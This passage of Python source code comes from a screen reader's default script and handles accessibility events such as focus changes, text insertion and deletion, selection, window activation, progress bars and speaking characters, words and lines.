state = obj.getState()
if state.contains(pyatspi.STATE_MANAGES_DESCENDANTS):
return
# TODO - JD: We need to give more thought to where we look to this
# event and where we prefer object:state-changed:selected.
# If the current item's selection is toggled, we'll present that
# via the state-changed event.
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString == "space":
return
# Save the event source, if it is a menu or combo box. It will be
# useful for optimizing componentAtDesktopCoords in the case that
# the pointer is hovering over a menu item. The alternative is to
# traverse the application's tree looking for potential moused-over
# menu items.
if obj.getRole() in (pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU):
self.lastSelectedMenu = obj
selectedChildren = self.utilities.selectedChildren(obj)
for child in selectedChildren:
if not self.utilities.isLayoutOnly(child):
orca.setLocusOfFocus(event, child)
break
def onSensitiveChanged(self, event):
"""Callback for object:state-changed:sensitive accessibility events."""
pass
def onFocus(self, event):
"""Callback for focus: accessibility events."""
pass
def onFocusedChanged(self, event):
"""Callback for object:state-changed:focused accessibility events."""
if not event.detail1:
return
obj = event.source
state = obj.getState()
if not state.contains(pyatspi.STATE_FOCUSED):
return
window = self.utilities.topLevelObject(obj)
if window:
try:
iconified = window.getState().contains(pyatspi.STATE_ICONIFIED)
except:
return
if iconified:
return
if obj and obj.childCount and obj.getRole() != pyatspi.ROLE_COMBO_BOX:
selectedChildren = self.utilities.selectedChildren(obj)
if selectedChildren:
obj = selectedChildren[0]
orca.setLocusOfFocus(event, obj)
def onShowingChanged(self, event):
"""Callback for object:state-changed:showing accessibility events."""
obj = event.source
role = obj.getRole()
if role == pyatspi.ROLE_NOTIFICATION:
speech.speak(self.speechGenerator.generateSpeech(obj))
visibleOnly = not self.utilities.isStatusBarNotification(obj)
labels = self.utilities.unrelatedLabels(obj, visibleOnly)
msg = ''.join(map(self.utilities.displayedText, labels))
self.displayBrailleMessage(msg, flashTime=settings.brailleFlashTime)
notification_messages.saveMessage(msg)
return
if role == pyatspi.ROLE_TOOL_TIP:
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString != "F1" \
and not _settingsManager.getSetting('presentToolTips'):
return
if event.detail1:
self.presentToolTip(obj)
return
if orca_state.locusOfFocus and keyString == "F1":
obj = orca_state.locusOfFocus
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj))
return
def onTextAttributesChanged(self, event):
"""Called when an object's text attributes change. Right now this
method is only to handle the presentation of spelling errors on
the fly. Also note that right now, the Gecko toolkit is the only
one to present this information to us.
Arguments:
- event: the Event
"""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if verbosity == settings.VERBOSITY_LEVEL_VERBOSE \
and self.utilities.isSameObject(
event.source, orca_state.locusOfFocus):
try:
text = event.source.queryText()
except:
return
# If the misspelled word indicator has just appeared, it's
# because the user typed a word boundary or navigated out
# of the word. We don't want to have to store a full set of
# each object's text attributes to compare, therefore, we'll
# check the previous word (most likely case) and the next
# word with respect to the current position.
#
offset = text.caretOffset
if not text.getText(offset, offset+1).isalnum():
offset -= 1
if self.utilities.isWordMisspelled(event.source, offset-1) \
or self.utilities.isWordMisspelled(event.source, offset+1):
self.speakMessage(messages.MISSPELLED)
def onTextDeleted(self, event):
"""Called whenever text is deleted from an object.
Arguments:
- event: the Event
"""
# Ignore text deletions from non-focused objects, unless the
# currently focused object is the parent of the object from which
# text was deleted
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
# We'll also ignore sliders because we get their output via
# their values changing.
#
if event.source.getRole() == pyatspi.ROLE_SLIDER:
return
# [[[NOTE: WDW - if we handle events synchronously, we'll
# be looking at the text object *before* the text was
# actually removed from the object. If we handle events
# asynchronously, we'll be looking at the text object
# *after* the text was removed. The importance of knowing
# this is that the output will differ depending upon how
# orca.settings.asyncMode has been set. For example, the
# regression tests run in synchronous mode, so the output
# they see will not be the same as what the user normally
# experiences.]]]
self.updateBraille(event.source)
# The any_data member of the event object has the deleted text in
# it - If the last key pressed was a backspace or delete key,
# speak the deleted text. [[[TODO: WDW - again, need to think
# about the ramifications of this when it comes to editors such
# as vi or emacs.
#
keyString, mods = self.utilities.lastKeyAndModifiers()
if not keyString:
return
text = event.source.queryText()
if keyString == "BackSpace":
# Speak the character that has just been deleted.
#
character = event.any_data
elif keyString == "Delete" \
or (keyString == "D" and mods & keybindings.CTRL_MODIFIER_MASK):
# Speak the character to the right of the caret after
# the current right character has been deleted.
#
offset = text.caretOffset
[character, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
else:
return
if len(character) == 1:
self.speakCharacter(character)
return
if self.utilities.linkIndex(event.source, text.caretOffset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
# We won't interrupt what else might be being spoken
# right now because it is typically something else
# related to this event.
#
speech.speak(character, voice, False)
def onTextInserted(self, event):
"""Called whenever text is inserted into an object.
Arguments:
- event: the Event
"""
# Ignore text insertions from non-focused objects, unless the
# currently focused object is the parent of the object from which
# text was inserted.
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
ignoreRoles = [pyatspi.ROLE_LABEL,
pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_SLIDER,
pyatspi.ROLE_SPIN_BUTTON]
role = event.source.getRole()
if role in ignoreRoles:
return
state = event.source.getState()
if role == pyatspi.ROLE_TABLE_CELL \
and not state.contains(pyatspi.STATE_FOCUSED) \
and not state.contains(pyatspi.STATE_SELECTED):
return
self.updateBraille(event.source)
# If the last input event was a keyboard event, check to see if
# the text for this event matches what the user typed. If it does,
# then don't speak it.
#
# Note that the text widgets sometimes compress their events,
# thus we might get a longer string from a single text inserted
# event, while we also get individual keyboard events for the
# characters used to type the string. This is ugly. We attempt
# to handle it here by only echoing text if we think it was the
# result of a command (e.g., a paste operation).
#
# Note that we have to special case the space character as it
# comes across as "space" in the keyboard event and " " in the
# text event.
#
string = event.any_data
speakThis = False
wasCommand = False
wasAutoComplete = False
if isinstance(orca_state.lastInputEvent, input_event.MouseButtonEvent):
speakThis = orca_state.lastInputEvent.button == "2"
else:
keyString, mods = self.utilities.lastKeyAndModifiers()
wasCommand = mods & keybindings.COMMAND_MODIFIER_MASK
if not wasCommand and keyString in ["Return", "Tab", "space"] \
and role == pyatspi.ROLE_TERMINAL \
and event.any_data.strip():
wasCommand = True
try:
selections = event.source.queryText().getNSelections()
except:
selections = 0
if selections:
wasAutoComplete = role in [pyatspi.ROLE_TEXT, pyatspi.ROLE_ENTRY]
if (string == " " and keyString == "space") or string == keyString:
pass
elif wasCommand or wasAutoComplete:
speakThis = True
elif role == pyatspi.ROLE_PASSWORD_TEXT \
and _settingsManager.getSetting('enableKeyEcho') \
and _settingsManager.getSetting('enablePrintableKeys'):
# Echoing "star" is preferable to echoing the descriptive
# name of the bullet that has appeared (e.g. "black circle")
#
string = "*"
speakThis = True
# Auto-completed, auto-corrected, auto-inserted, etc.
#
speakThis = speakThis or self.utilities.isAutoTextEvent(event)
# We might need to echo this if it is a single character.
#
speakThis = speakThis \
or (_settingsManager.getSetting('enableEchoByCharacter') \
and string \
and role != pyatspi.ROLE_PASSWORD_TEXT \
and len(string.strip()) == 1)
if speakThis:
if string.isupper():
speech.speak(string, self.voices[settings.UPPERCASE_VOICE])
elif not string.isalnum():
self.speakCharacter(string)
else:
speech.speak(string)
if wasCommand:
return
if wasAutoComplete:
self.pointOfReference['lastAutoComplete'] = hash(event.source)
try:
text = event.source.queryText()
except NotImplementedError:
return
offset = text.caretOffset - 1
previousOffset = offset - 1
if (offset < 0 or previousOffset < 0):
return
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(previousOffset, pyatspi.TEXT_BOUNDARY_CHAR)
if _settingsManager.getSetting('enableEchoBySentence') \
and self.utilities.isSentenceDelimiter(currentChar, previousChar):
self.echoPreviousSentence(event.source)
elif _settingsManager.getSetting('enableEchoByWord') \
and self.utilities.isWordDelimiter(currentChar):
self.echoPreviousWord(event.source)
def onTextSelectionChanged(self, event):
"""Callback for object:text-selection-changed accessibility events."""
obj = event.source
self.updateBraille(obj)
# Note: This guesswork to figure out what actually changed with respect
# to text selection will get eliminated once the new text-selection API
# is added to ATK and implemented by the toolkits. (BGO 638378)
textSelections = self.pointOfReference.get('textSelections', {})
oldStart, oldEnd = textSelections.get(hash(obj), (0, 0))
# TODO: JD - this doesn't yet handle the case of multiple non-contiguous
# selections in a single accessible object.
text = obj.queryText()
newStart, newEnd = text.getSelection(0)
textSelections[hash(obj)] = newStart, newEnd
self.pointOfReference['textSelections'] = textSelections
if self.pointOfReference.get('lastAutoComplete') == hash(obj):
return
nSelections = text.getNSelections()
handled = self._speakTextSelectionState(nSelections)
if handled:
return
changes = []
oldChars = set(range(oldStart, oldEnd))
newChars = set(range(newStart, newEnd))
if not oldChars.union(newChars):
return
if oldChars and newChars and not oldChars.intersection(newChars):
# A simultaneous unselection and selection centered at one offset.
changes.append([oldStart, oldEnd, messages.TEXT_UNSELECTED])
changes.append([newStart, newEnd, messages.TEXT_SELECTED])
else:
change = sorted(oldChars.symmetric_difference(newChars))
if not change:
return
changeStart, changeEnd = change[0], change[-1] + 1
if oldChars < newChars:
changes.append([changeStart, changeEnd, messages.TEXT_SELECTED])
else:
changes.append([changeStart, changeEnd, messages.TEXT_UNSELECTED])
speakMessage = not _settingsManager.getSetting('onlySpeakDisplayedText')
for start, end, message in changes:
self.sayPhrase(obj, start, end)
if speakMessage:
self.speakMessage(message, interrupt=False)
def onColumnReordered(self, event):
"""Called whenever the columns in a table are reordered.
Arguments:
- event: the Event
"""
parentTable = self.utilities.ancestorWithRole(
orca_state.locusOfFocus, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_FRAME])
if event.source != parentTable:
return
self.presentMessage(messages.TABLE_REORDERED_COLUMNS)
def onRowReordered(self, event):
"""Called whenever the rows in a table are reordered.
Arguments:
- event: the Event
"""
parentTable = self.utilities.ancestorWithRole(
orca_state.locusOfFocus, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_FRAME])
if event.source != parentTable:
return
self.presentMessage(messages.TABLE_REORDERED_ROWS)
def onValueChanged(self, event):
"""Called whenever an object's value changes. Currently, the
value changes for non-focused objects are ignored.
Arguments:
- event: the Event
"""
obj = event.source
role = obj.getRole()
value = obj.queryValue()
if "oldValue" in self.pointOfReference \
and (value.currentValue == self.pointOfReference["oldValue"]):
return
if role == pyatspi.ROLE_PROGRESS_BAR:
self.handleProgressBarUpdate(event, obj)
return
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
self.pointOfReference["oldValue"] = value.currentValue
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
def onWindowActivated(self, event):
"""Called whenever a toplevel window is activated.
Arguments:
- event: the Event
"""
self.pointOfReference = {}
self.windowActivateTime = time.time()
orca.setLocusOfFocus(event, event.source)
# We keep track of the active window to handle situations where
# we get window activated and window deactivated events out of
# order (see onWindowDeactivated).
#
# For example, events can be:
#
# window:activate (w1)
# window:activate (w2)
# window:deactivate (w1)
#
# as well as:
#
# window:activate (w1)
# window:deactivate (w1)
# window:activate (w2)
#
orca_state.activeWindow = event.source
def onWindowCreated(self, event):
"""Callback for window:create accessibility events."""
pass
def onWindowDeactivated(self, event):
"""Called whenever a toplevel window is deactivated.
Arguments:
- event: the Event
"""
self.pointOfReference = {}
menuRoles = [pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_CHECK_MENU_ITEM,
pyatspi.ROLE_RADIO_MENU_ITEM]
# If we get into a popup menu, the parent application will likely
# emit a window-deactivate event. But functionally we're still in
# the same window. In this case, we do not want to update anything.
try:
role = orca_state.locusOfFocus.getRole()
except:
pass
else:
if role in menuRoles:
return
# If we receive a "window:deactivate" event for the object that
# currently has focus, then stop the current speech output.
# This is very useful for terminating long speech output from
# commands running in gnome-terminal.
#
if orca_state.locusOfFocus and \
(orca_state.locusOfFocus.getApplication() == \
event.source.getApplication()):
speech.stop()
# Clear the braille display just in case we are about to give
# focus to an inaccessible application. See bug #519901 for
# more details.
#
self.clearBraille()
# Hide the flat review window and reset it so that it will be
# recreated.
#
if self.flatReviewContext:
self.flatReviewContext = None
self.updateBraille(orca_state.locusOfFocus)
# Because window activated and deactivated events may be
# received in any order when switching from one application to
# another, locusOfFocus and activeWindow, we really only change
# the locusOfFocus and activeWindow when we are dealing with
# an event from the current activeWindow.
#
if event.source == orca_state.activeWindow:
orca.setLocusOfFocus(event, None)
orca_state.activeWindow = None
# disable list notification messages mode
notification_messages.listNotificationMessagesModeEnabled = False
# disable learn mode
orca_state.learnModeEnabled = False
########################################################################
# #
# Methods for presenting content #
# #
########################################################################
def _presentTextAtNewCaretPosition(self, event, otherObj=None):
"""Updates braille and outputs speech for the event.source or the
otherObj."""
obj = otherObj or event.source
text = obj.queryText()
self.updateBrailleForNewCaretPosition(obj)
if self._inSayAll:
return
if not orca_state.lastInputEvent:
return
if isinstance(orca_state.lastInputEvent, input_event.MouseButtonEvent):
if not orca_state.lastInputEvent.pressed:
self.sayLine(obj)
return
# Guess why the caret moved and say something appropriate.
# [[[TODO: WDW - this motion assumes traditional GUI
# navigation gestures. In an editor such as vi, line up and
# down is done via other actions such as "i" or "j". We may
# need to think about this a little harder.]]]
#
keyString, mods = self.utilities.lastKeyAndModifiers()
if not keyString:
return
isControlKey = mods & keybindings.CTRL_MODIFIER_MASK
if keyString in ["Up", "Down"]:
self.sayLine(obj)
elif keyString in ["Left", "Right"]:
if isControlKey:
self.sayWord(obj)
else:
self.sayCharacter(obj)
elif keyString == "Page_Up":
# TODO - JD: Why is Control special here?
# If the user has typed Control-Page_Up, then we
# speak the character to the right of the current text cursor
# position otherwise we speak the current line.
#
if isControlKey:
self.sayCharacter(obj)
else:
self.sayLine(obj)
elif keyString == "Page_Down":
self.sayLine(obj)
elif keyString in ["Home", "End"]:
if isControlKey:
self.sayLine(obj)
else:
self.sayCharacter(obj)
def _rewindSayAll(self, context, minCharCount=10):
if not _settingsManager.getSetting('rewindAndFastForwardInSayAll'):
return False
index = self._sayAllContexts.index(context)
self._sayAllContexts = self._sayAllContexts[0:index]
while self._sayAllContexts:
context = self._sayAllContexts.pop()
if context.endOffset - context.startOffset > minCharCount:
break
try:
text = context.obj.queryText()
except:
pass
else:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.startOffset)
self.sayAll(None, context.obj, context.startOffset)
return True
def _fastForwardSayAll(self, context):
if not _settingsManager.getSetting('rewindAndFastForwardInSayAll'):
return False
try:
text = context.obj.queryText()
except:
pass
else:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.endOffset)
self.sayAll(None, context.obj, context.endOffset)
return True
def __sayAllProgressCallback(self, context, progressType):
# [[[TODO: WDW - this needs work. Need to be able to manage
# the monitoring of progress and couple that with both updating
# the visual progress of what is being spoken as well as
# positioning the cursor when speech has stopped.]]]
#
try:
text = context.obj.queryText()
char = text.getText(context.currentOffset, context.currentOffset+1)
except:
return
# Setting the caret at the offset of an embedded object results in
# focus changes.
if char == self.EMBEDDED_OBJECT_CHARACTER:
return
if progressType == speechserver.SayAllContext.PROGRESS:
return
elif progressType == speechserver.SayAllContext.INTERRUPTED:
if isinstance(orca_state.lastInputEvent, input_event.KeyboardEvent):
self._sayAllIsInterrupted = True
lastKey = orca_state.lastInputEvent.event_string
if lastKey == "Down" and self._fastForwardSayAll(context):
return
elif lastKey == "Up" and self._rewindSayAll(context):
return
self._inSayAll = False
self._sayAllContexts = []
text.setCaretOffset(context.currentOffset)
elif progressType == speechserver.SayAllContext.COMPLETED:
orca.setLocusOfFocus(None, context.obj, notifyScript=False)
text.setCaretOffset(context.currentOffset)
# If there is a selection, clear it. See bug #489504 for more details.
#
if text.getNSelections():
text.setSelection(0, context.currentOffset, context.currentOffset)
def inSayAll(self):
return self._inSayAll or self._sayAllIsInterrupted
def echoPreviousSentence(self, obj):
"""Speaks the sentence prior to the caret, as long as there is
a sentence prior to the caret and there is no intervening sentence
delimiter between the caret and the end of the sentence.
The entry condition for this method is that the character
prior to the current caret position is a sentence delimiter,
and it's what caused this method to be called in the first
place.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface.
"""
try:
text = obj.queryText()
except NotImplementedError:
return
offset = text.caretOffset - 1
previousOffset = text.caretOffset - 2
if (offset < 0 or previousOffset < 0):
return
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(previousOffset, pyatspi.TEXT_BOUNDARY_CHAR)
if not self.utilities.isSentenceDelimiter(currentChar, previousChar):
return
# OK - we seem to be cool so far. So...starting with what
# should be the last character in the sentence (caretOffset - 2),
# work our way to the beginning of the sentence, stopping when
# we hit another sentence delimiter.
#
sentenceEndOffset = text.caretOffset - 2
sentenceStartOffset = sentenceEndOffset
while sentenceStartOffset >= 0:
[currentChar, startOffset, endOffset] = \
text.getTextAtOffset(sentenceStartOffset,
pyatspi.TEXT_BOUNDARY_CHAR)
[previousChar, startOffset, endOffset] = \
text.getTextAtOffset(sentenceStartOffset-1,
pyatspi.TEXT_BOUNDARY_CHAR)
if self.utilities.isSentenceDelimiter(currentChar, previousChar):
break
else:
sentenceStartOffset -= 1
# If we came across a sentence delimiter before hitting any
# text, we really don't have a previous sentence.
#
# Otherwise, get the sentence. Remember we stopped when we
# hit a sentence delimiter, so the sentence really starts at
# sentenceStartOffset + 1. getText also does not include
# the character at sentenceEndOffset, so we need to adjust
# for that, too.
#
if sentenceStartOffset == sentenceEndOffset:
return
else:
sentence = self.utilities.substring(obj, sentenceStartOffset + 1,
sentenceEndOffset + 1)
if self.utilities.linkIndex(obj, sentenceStartOffset + 1) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif sentence.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
sentence = self.utilities.adjustForRepeats(sentence)
speech.speak(sentence, voice)
def echoPreviousWord(self, obj, offset=None):
"""Speaks the word prior to the caret, as long as there is
a word prior to the caret and there is no intervening word
delimiter between the caret and the end of the word.
The entry condition for this method is that the character
prior to the current caret position is a word delimiter,
and it's what caused this method to be called in the first
place.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface.
- offset: if not None, the offset within the text to use as the
end of the word.
"""
try:
text = obj.queryText()
except NotImplementedError:
return
if not offset:
if text.caretOffset == -1:
offset = text.characterCount
else:
offset = text.caretOffset - 1
if (offset < 0):
return
[char, startOffset, endOffset] = \
text.getTextAtOffset( \
offset,
pyatspi.TEXT_BOUNDARY_CHAR)
if not self.utilities.isWordDelimiter(char):
return
# OK - we seem to be cool so far. So...starting with what
# should be the last character in the word (caretOffset - 2),
# work our way to the beginning of the word, stopping when
# we hit another word delimiter.
#
wordEndOffset = offset - 1
wordStartOffset = wordEndOffset
while wordStartOffset >= 0:
[char, startOffset, endOffset] = \
text.getTextAtOffset( \
wordStartOffset,
pyatspi.TEXT_BOUNDARY_CHAR)
if self.utilities.isWordDelimiter(char):
break
else:
wordStartOffset -= 1
# If we came across a word delimiter before hitting any
# text, we really don't have a previous word.
#
# Otherwise, get the word. Remember we stopped when we
# hit a word delimiter, so the word really starts at
# wordStartOffset + 1. getText also does not include
# the character at wordEndOffset, so we need to adjust
# for that, too.
#
if wordStartOffset == wordEndOffset:
return
else:
word = self.utilities.\
substring(obj, wordStartOffset + 1, wordEndOffset + 1)
if self.utilities.linkIndex(obj, wordStartOffset + 1) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif word.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
word = self.utilities.adjustForRepeats(word)
speech.speak(word, voice)
def handleProgressBarUpdate(self, event, obj):
"""Determine whether this progress bar event should be spoken or not.
It should be spoken if:
1/ settings.enableProgressBarUpdates is True.
2/ settings.progressBarVerbosity matches the current location of the
progress bar.
3/ The time of this event exceeds the
settings.progressBarUpdateInterval value. This value
indicates the time (in seconds) between potential spoken
progress bar updates.
4/ The new value of the progress bar (converted to an integer),
is different from the last one or equals 100 (i.e complete).
Arguments:
- event: if not None, the Event that caused this to happen
- obj: the Accessible progress bar object.
"""
if _settingsManager.getSetting('enableProgressBarUpdates'):
makeAnnouncement = False
verbosity = _settingsManager.getSetting('progressBarVerbosity')
if verbosity == settings.PROGRESS_BAR_ALL:
makeAnnouncement = True
elif verbosity == settings.PROGRESS_BAR_WINDOW:
makeAnnouncement = self.utilities.isSameObject(
self.utilities.topLevelObject(obj),
self.utilities.activeWindow())
elif orca_state.locusOfFocus:
makeAnnouncement = self.utilities.isSameObject( \
obj.getApplication(),
orca_state.locusOfFocus.getApplication())
if makeAnnouncement:
currentTime = time.time()
# Check for defunct progress bars. Get rid of them if they
# are all defunct. Also find out which progress bar was
# the most recently updated.
#
defunctBars = 0
mostRecentUpdate = [obj, 0]
for key, value in list(self.lastProgressBarTime.items()):
if value > mostRecentUpdate[1]:
mostRecentUpdate = [key, value]
try:
isDefunct = \
key.getState().contains(pyatspi.STATE_DEFUNCT)
except:
isDefunct = True
if isDefunct:
defunctBars += 1
if defunctBars == len(self.lastProgressBarTime):
self.lastProgressBarTime = {}
self.lastProgressBarValue = {}
# If this progress bar is not already known, create initial
# values for it.
#
if obj not in self.lastProgressBarTime:
self.lastProgressBarTime[obj] = 0.0
if obj not in self.lastProgressBarValue:
self.lastProgressBarValue[obj] = None
lastProgressBarTime = self.lastProgressBarTime[obj]
lastProgressBarValue = self.lastProgressBarValue[obj]
value = obj.queryValue()
try:
if value.maximumValue == value.minimumValue:
# This is a busy indicator and not a real progress bar.
return
except:
return
percentValue = int((value.currentValue / \
(value.maximumValue - value.minimumValue)) * 100.0)
if _settingsManager.getSetting('progressBarBeep'):
if self.lastProgressBarValue != percentValue:
if percentValue < 7:
self.sound.source_set_property('freq', int((98 + percentValue * 4 * 1.35)))
self.sound._threadSound (0.075)
else:
self.sound.source_set_property('freq', int(19 * percentValue * 1.15))
self.sound.source_set_property('volume', 1 - (percentValue / 130))
if percentValue >= 99:
self.sound._threadSound (1)
else:
self.sound._threadSound (0.075)
if _settingsManager.getSetting('progressBarSpeak'):
if (currentTime - lastProgressBarTime) > \
_settingsManager.getSetting('progressBarUpdateInterval') \
or (percentValue == 100):
if lastProgressBarValue != percentValue:
utterances = []
# There may be cases when more than one progress
# bar is updating at the same time in a window.
# If this is the case, then speak the index of this
# progress bar in the dictionary of known progress
# bars, as well as the value. But only speak the
# index if this progress bar was not the most
# recently updated to prevent chattiness.
if len(self.lastProgressBarTime) > 1:
index = 0
for key in list(self.lastProgressBarTime.keys()):
if key == obj and key != mostRecentUpdate[0]:
label = messages.PROGRESS_BAR_NUMBER % (index + 1)
utterances.append(label)
else:
index += 1
utterances.extend(self.speechGenerator.generateSpeech(
obj, alreadyFocused=True))
speech.speak(utterances)
self.lastProgressBarTime[obj] = currentTime
if lastProgressBarValue != percentValue:
self.lastProgressBarValue[obj] = percentValue
def presentToolTip(self, obj):
"""
Speaks the tooltip for the current object of interest.
"""
# The tooltip is generally the accessible description. If
# the description is not set, present the text that is
# spoken when the object receives keyboard focus.
#
speechResult = brailleResult = None
text = ""
if obj.description:
speechResult = brailleResult = obj.description
else:
speechResult = self.whereAmI.getWhereAmI(obj, True)
if speechResult:
brailleResult = speechResult[0]
debug.println(debug.LEVEL_FINEST,
"presentToolTip: text='%s'" % speechResult)
if speechResult:
speech.speak(speechResult)
if brailleResult:
self.displayBrailleMessage(brailleResult)
def sayCharacter(self, obj):
"""Speak the character at the caret.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
text = obj.queryText()
offset = text.caretOffset
# If we have selected text and the last event was a move to the
# right, then speak the character to the left of where the text
# caret is (i.e. the selected character).
#
eventString, mods = self.utilities.lastKeyAndModifiers()
if (mods & keybindings.SHIFT_MODIFIER_MASK) \
and eventString in ["Right", "Down"]:
offset -= 1
character, startOffset, endOffset = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
if not character or character == '\r':
character = "\n"
if self.utilities.linkIndex(obj, offset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
speakBlankLines = _settingsManager.getSetting('speakBlankLines')
debug.println(debug.LEVEL_FINEST, \
"sayCharacter: char=<%s>, startOffset=%d, " % \
(character, startOffset))
debug.println(debug.LEVEL_FINEST, \
"caretOffset=%d, endOffset=%d, speakBlankLines=%s" % \
(offset, endOffset, speakBlankLines))
if character == "\n":
line = text.getTextAtOffset(max(0, offset),
pyatspi.TEXT_BOUNDARY_LINE_START)
if not line[0] or line[0] == "\n":
# This is a blank line. Announce it if the user requested
# that blank lines be spoken.
if speakBlankLines:
self.speakMessage(messages.BLANK, interrupt=False)
return
if character in ["\n", "\r\n"]:
# This is a blank line. Announce it if the user requested
# that blank lines be spoken.
if speakBlankLines:
self.speakMessage(messages.BLANK, interrupt=False)
return
else:
self.speakMisspelledIndicator(obj, offset)
self.speakCharacter(character)
def sayLine(self, obj):
"""Speaks the line of an AccessibleText object that contains the
caret, unless the line is empty in which case it's ignored.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
# Get the AccessibleText interface of the provided object
#
[line, caretOffset, startOffset] = self.getTextLineAtCaret(obj)
debug.println(debug.LEVEL_FINEST, \
"sayLine: line=<%s>, len=%d, start=%d, " % \
(line, len(line), startOffset))
debug.println(debug.LEVEL_FINEST, \
"caret=%d, speakBlankLines=%s" % \
(caretOffset, _settingsManager.getSetting('speakBlankLines')))
if len(line) and line != "\n":
if line.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
result = \
self.speechGenerator.generateTextIndentation(obj, line=line)
if result:
self.speakMessage(result[0])
line = self.utilities.adjustForLinks(obj, line, startOffset)
line = self.utilities.adjustForRepeats(line)
speech.speak(line, voice)
else:
# Speak blank line if appropriate.
#
self.sayCharacter(obj)
def sayPhrase(self, obj, startOffset, endOffset):
"""Speaks the text of an Accessible object between the start and
end offsets, unless the phrase is empty in which case it's ignored.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
- startOffset: the start text offset.
- endOffset: the end text offset.
"""
phrase = self.utilities.expandEOCs(obj, startOffset, endOffset)
if not phrase:
return
if len(phrase) > 1 or phrase.isalnum():
if phrase.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
phrase = self.utilities.adjustForRepeats(phrase)
speech.speak(phrase, voice)
else:
self.sayCharacter(obj)
def sayWord(self, obj):
"""Speaks the word at the caret.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
text = obj.queryText()
offset = text.caretOffset
lastKey, mods = self.utilities.lastKeyAndModifiers()
lastWord = self._lastWord
[word, startOffset, endOffset] = \
text.getTextAtOffset(offset,
pyatspi.TEXT_BOUNDARY_WORD_START)
if not word:
self.sayCharacter(obj)
return
# Speak a newline if a control-right-arrow or control-left-arrow
# was used to cross a line boundary. Handling is different for
# the two keys since control-right-arrow places the cursor after
# the last character in a word, but control-left-arrow places
# the cursor at the beginning of a word.
#
if lastKey == "Right" and len(lastWord) > 0:
lastChar = lastWord[len(lastWord) - 1]
if lastChar == "\n" and lastWord != word:
self.speakCharacter("\n")
if lastKey == "Left" and len(word) > 0:
lastChar = word[len(word) - 1]
if lastChar == "\n" and lastWord != word:
self.speakCharacter("\n")
if self.utilities.linkIndex(obj, offset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif word.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
self.speakMisspelledIndicator(obj, startOffset)
word = self.utilities.adjustForRepeats(word)
self._lastWord = word
speech.speak(word, voice)
def presentObject(self, obj, offset=0):
self.updateBraille(obj)
utterances = self.speechGenerator.generateSpeech(obj)
speech.speak(utterances, voice)
def stopSpeechOnActiveDescendantChanged(self, event):
"""Whether or not speech should be stopped prior to setting the
locusOfFocus in onActiveDescendantChanged.
Arguments:
- event: the Event
Returns True if speech should be stopped; False otherwise.
"""
if not event.any_data:
return True
# In an object which manages its descendants, the
# 'descendants' may really be a single object which changes
# its name. If the name-change occurs followed by the active
# descendant changing (to the same object) we won't present
# the locusOfFocus because it hasn't changed. Thus we need to
# be sure not to cut of the presentation of the name-change
# event.
if orca_state.locusOfFocus == event.any_data:
names = self.pointOfReference.get('names', {})
oldName = names.get(hash(orca_state.locusOfFocus), '')
if not oldName or event.any_data.name == oldName:
return False
if event.source == orca_state.locusOfFocus == event.any_data.parent:
return False
return True
def getFlatReviewContext(self):
"""Returns the flat review context, creating one if necessary."""
if not self.flatReviewContext:
self.flatReviewContext = self.flatReviewContextClass(self)
self.justEnteredFlatReviewMode = True
# Remember where the cursor currently was
# when the user was in focus tracking mode. We'll try to
# keep the position the same as we move to characters above
# and below us.
#
self.targetCursorCell = self.getBrailleCursorCell()
return self.flatReviewContext
def updateBrailleReview(self, targetCursorCell=0):
"""Obtains the braille regions for the current flat review line
and displays them on the braille display. If the targetCursorCell
is non-0, then an attempt will be made to postion the review cursor
at that cell. Otherwise, we will pan in display-sized increments
to show the review cursor."""
